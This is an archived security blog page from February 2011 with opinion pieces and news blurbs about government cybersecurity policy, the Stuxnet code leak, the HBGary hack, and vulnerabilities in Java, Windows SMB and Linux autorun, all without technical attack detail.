« Archives in February, 2011

How Hackers Could Exploit Federal Government Shutdown

I know I got beat up for this last time but yet another pundit attempts to make news out of something he has no knowledge of. Neal Ungerleider wrote an article titled “How Hackers Could Exploit Federal Government Shutdown” for Fast Company. Mr. Ungerleider writes:

The possible government shutdown scheduled for March 4, 2011 could trigger a cyberwar emergency. If non-essential government employees end up being furloughed in early March, the federal government’s computer systems will be run by a shortlist of critical-need employees.

The problem with this statement is that the majority of the government’s infrastructure is managed and maintained by contractors.

While government agencies are indeed scrambling to put together lists of emergency security employees to fight potential hacker attacks from China and elsewhere, there’s one problem. The federal government works at the speed of bureaucracy.

Ok, you got that one right. The government does work at the speed of bureaucracy and that’s why we are in this situation. However, the security employees are not all federal employees and not all of the network infrastructure is managed and maintained by the federal government. Thankfully, the majority of the critical infrastructure to include the networks that the federal government use are run by contractor employees that will not be affected by a government shutdown. The men and women that already do this day in and day out will still be there fulfilling their roles.

With only five working days remaining before the potential shutdown, there is a strong likelihood of a lapse in the federal government’s network security infrastructure.

Not likely, the only lapse will be in the effectiveness of the people we have elected to do what we entrusted them to do and that’s to run the government.

Read more…

A Chat With The Cybersecurity Czar

“Howard Schmidt talks global cooperation in cyberattack prevention, and how the feds should share threat intelligence with private industry”

Are you kidding me? The federal government has a hard time sharing threat intelligence amongst itself. So, how are they going to filter that down to the private industry with anything actionable? The federal government continues to be a paper trail of bureaucracy that does anything to promote an effective cyber security program. The most important thing to do is meet the Office of Management and Budget (OMB) mandates (why they are directing cyber security through worthless mandates, I don’t know) and respond with your mandatory FISMA paperwork.

The Czar goes on to say:

When asked how these events have shaped or changed the mission of his office, Schmidt reiterated that his office is in charge of coordinating the government’s cybersecurity efforts. “We are a convening body, a coordinating body,” he said. The White House office basically provides the mechanism for cyberincident response, he noted.

I beg to differ. The cyber security efforts have been coordinated and carried out by the boots on the ground. It’s the men and women that have a true desire for cyber security leading the charge in the trenches and dealing with the compliance and paperwork that does nothing for security. I can honestly say that I have never had the White House staff working endless hours by my side during a major incident. Providing the mechanism for cyber incident response means to quit bickering over the budget and provide the funds and resources to properly implement a cyber security program.

I’ll wait to see what kind of comments I get but if Mr. Schmidt wants to attract and retain Information Security talent then he needs to put his money where his mouth is. Most people I know in the field aren’t worried about becoming the next undersecurity for cyber security. They want to be productive and proactive in their efforts to secure the Nation’s networks, federal and private, and rest assured that the government is providing the resources to do so.

Let’s quit talking and start doing.

Read more…

Facebook users subjected to more clickjacking

Facebook users have been subjected to another round of clickjacking attacks that force them to authorize actions they had no intention of approving.

The latest episode in this continuing saga, according to Sophos researchers, is a set of campaigns aimed at Italian-speaking users of the social network. The come-ons promise shocking videos about such things as the real ingredients of Coca Cola. Instead, they are forced into registering their approval of the videos using Facebook’s “Like” button.

Read more…

Anonymous Hackers Release Stuxnet Worm Online…so what?

Fox News has released an article by Jeremy A. Kaplan titled “Anonymous Hackers Release Stuxnet Worm Online.” A friend of mine pointed me to the article and at first it seemed real interesting when Kaplan mentioned “a decrypted version of the same cyberworm that crippled Iran’s nuclear power program.”

I was actually excited when my friend said he was downloading a copy. However, what is really being offered up is a partially decompiled with Hex-Rays version of stuxnet. This isn’t all that glamorous. Who doesn’t have a copy of this that does any type of malware research.

The most troubling issue I have with the Fox News article is:

“And the security experts FoxNews.com spoke with said the leaked code was serious cause for concern.”

Who are the experts? It’s no more serious than it was months ago. Stuxnet code has been out there for some time. My version, just like the newly acquired code by Anonymous, has been partially decompiled with Hex-Rays too. I don’t want to discredit Dave Aitel, CEO of Immunity Inc., as a highly respected security expert though.

“The stuxnet binary is widely available,” Aitel told FoxNews.com. “The people who would use the binary would know how to find it.”

As well as, know how to decompile it. Thanks for keeping the media straight, Dave.

Anonymous speaks: the inside story of the HBGary hack

A really good article has been posted on Ars Technica about the HBGary hack.

Read more…

Java 6 Update 24 Plugs 21 Securty Holes

A new version of Java fixes at least 21 security flaws in the widely-distributed software bundle. Updates are available for Windows, Linux and Solaris users.

Read the advisory

Windows 0-day SMB mrxsmb.dll vulnerability

A new vulnerability has been discovered exploiting SMB component of Windows. The attack involves sending of malformed Browser Election requests leading the heap overflow within the mrxsmb.dll driver. The vulnerability is known to be able to cause DoS and fully control of vulnerable machines. Proof of concept code for DoS had been released.

Read the advisory

Hacked and Now Vandalized, HBGary Pulls out of RSA

The California security company that is at the center of a controversy over a plan to discredit WikiLeaks and its supporters abruptly pulled itself out of the RSA security conference in San Francisco this week, citing security concerns.

The company’s subsidiary, HBGary Federal, also cancelled a talk it had planned to give on the Internet activist group, Anonymous. It was news of this talk that riled Anonymous and precipitated the controversy last week.

Read more…

Seven Types of Hackers

Roger Grimes has published an article titled “Your guide to the seven types of malicious hackers.” The article explains that importance of knowing the difference between a spammer, a corporate spy, and a cyber warrior so it can better help you defend your systems.

He goes on to list the following seven types:

  • Cyber criminals
  • Spammers and adware spreaders
  • Advanced persistent threat (APT) agents
  • Corporate spies
  • Hactivists
  • Cyber warriors
  • Rogue hackers
  • Read more…

    Linux vulnerable to Windows-style autorun exploits

    Jon Larimer, of IBM’s X-Force security division, has demonstrated how it might be possible to perform autorun-style attacks against weakly secured Linux PCs. Larimer developed a demo to show how it might be possible to insert a USB stick with modified code into a Ubuntu PC to get rid of a screensaver without entering a password – and display the user’s desktop.

    Read more…